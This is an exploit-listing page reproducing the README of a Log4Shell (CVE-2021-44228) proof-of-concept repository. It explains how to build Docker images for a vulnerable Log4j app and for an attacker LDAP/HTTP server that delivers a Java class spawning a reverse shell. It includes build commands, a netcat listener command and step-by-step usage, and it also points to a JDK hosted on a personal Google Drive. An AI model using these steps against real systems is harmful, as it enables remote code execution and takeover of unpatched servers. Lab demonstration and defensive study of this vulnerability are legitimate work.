Exploit for Uncontrolled Resource Consumption in Apache Log4J CVE-2021-44228

Name: Exploit for Uncontrolled Resource Consumption in Apache Log4J CVE-2021-44228
Rating: 5 (257 reviews)
2022-05-13 | CVSS 9.3
## https://sploitus.com/exploit?id=4F57CC9C-B908-544E-92E7-92A49DE89B00
# Log4Shell Proof-Of-Concept

This repository is a Proof-Of-Concept for CVE-2021-44228 vulnerability.

It is derived from [This Repo](https://github.com/kozmer/log4j-shell-poc).

In this repository I have made an example of a vulnerable application and a demonstration of how to exploit it.

# Proof-of-concept Components

I have modified the upstream python script to automate generation of this vulnarability.

In this repo there are two Dockerfiles for easy use as follows:

## Docker-Ldap

In this Docker image we download java [jdk-8u20](https://drive.google.com/file/d/1WP2ncclnbViIkGwhfAaVesFoTiVFTCjQ/view?usp=sharing) from my google drive as you are required to make an account on oracle in order to download this.

If you do not trust this, you can modify the downloading file from the Dockerfile and download
the jdk from [here](https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html) (Make sure you downlaod Java SE Development Kit 8u20 version for linux).

This Docker Image runs a modified version of the script provided by [kozmer](https://github.com/kozmer/log4j-shell-poc) and it does the following:
- Generates and compiles a java class that spawns a reverse shell (named Exploit) - jdk is required for this.
- Creates an [JNDI LDAP server](https://github.com/mbechler/marshalsec) that can perform lookups and resolves request to map to our server where the payload will reside. 
- Opens a SimpleHttpServer that can provide files via requests generated by JNDI lookup.
  
Default ports used for this are `1389` for JNDI LDAP, `8000` for the SimpleHttpServer and **`9001`** for the reverse shell!

In order to compile and run this run:

```bash
sudo docker build -t log4j-ldap . 
sudo docker run -d -p 8000:8000 -p 1389:1389 log4j-ldap
```

Use `docker logs <containerID>` in order to see logs from app and retreive the correct input that need to be provided to the vulnerable app

For this PoC I have considered the default IPs used by docker (172.17.0.1/24), you can change them in `./Docker-Ldap/run.sh` script to match your scenario.

## Docker-Vuln

In this docker image run a vulnerable web application that uses the unpatched version of Log4J 2 and exposes it on port `8080`.

The app source is also available in `./Docker-Vuln`, credits to [kozmer](https://github.com/kozmer/log4j-shell-poc).

In order to compile and run this run:

```bash
sudo docker build -t log4j-ldap . 
sudo docker run -d -p 8000:8000 -p 1389:1389 log4j-ldap
```

**`Username is the injectable field!`**


## Netcal listener 

In order to accept the reverse shell you must create a netcat listener for port **`9001`**

```bash
nc -lvnp 9001
```

# How to use

After downloading the repo, make sure you have docker engine installed and do not have other dokcer images running on your machine.

- After that run the `config.sh` script to build images and start them. (This script uses root privileges to run, you can modify them accordingly).
- Open a netcat listener on port **`9001`**.
- Fire up your browser and navigate to `localhost:8080`
- Extract payload from log4j-ldap docker container logs (`docker logs <containerID>`).
- Enter the payload in user field and a random password.
- Enjoy!

# Useful resources:

- [A Journey From JNDI/LDAP Manipulation to Remote Code Execution Dream Land](https://www.youtube.com/watch?v=Y8a5nB-vy78)
- [Apache Log4j Security Vulnerabilities](https://logging.apache.org/log4j/2.x/security.html)
- [CVE-2021-44228](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2021-44228)
- [CVE-2021-44228 Detail](https://nvd.nist.gov/vuln/detail/CVE-2021-44228)
- [Log4j Lookups in Depth](https://www.youtube.com/watch?v=iI9Dz3zN4d8)
- [Log4j Vulnerability](https://www.youtube.com/watch?v=w2F67LbEtnk)
- [CVE-2021-44228 - Log4j - MINECRAFT VULNERABLE](https://www.youtube.com/watch?v=7qoPDq41xhQ)
- [Log4Shell: RCE 0-day exploit found in log4j 2](https://www.lunasec.io/docs/blog/log4j-zero-day/)
- [How to Automatically Mitigate Log4Shell via a Live Patch ](https://www.lunasec.io/docs/blog/log4shell-live-patch/)
- [Understanding Log4Shell via Exploitation and Live Patching ](https://www.lunasec.io/docs/blog/log4shell-live-patch-technical/)
- [How To Detect and Mitigate the Log4Shell Vulnerability](https://www.lunasec.io/docs/blog/log4j-zero-day-mitigation-guide/)

# Timeline events that lead to the vulnerability:
  - [JNDI Lookup plugin support](https://issues.apache.org/jira/browse/LOG4J2-313)
  - [Ability to disable (date) lookup completely](https://issues.apache.org/jira/browse/LOG4J2-905)
  - [Add property to disable message pattern converter lookups](https://issues.apache.org/jira/browse/LOG4J2-2109)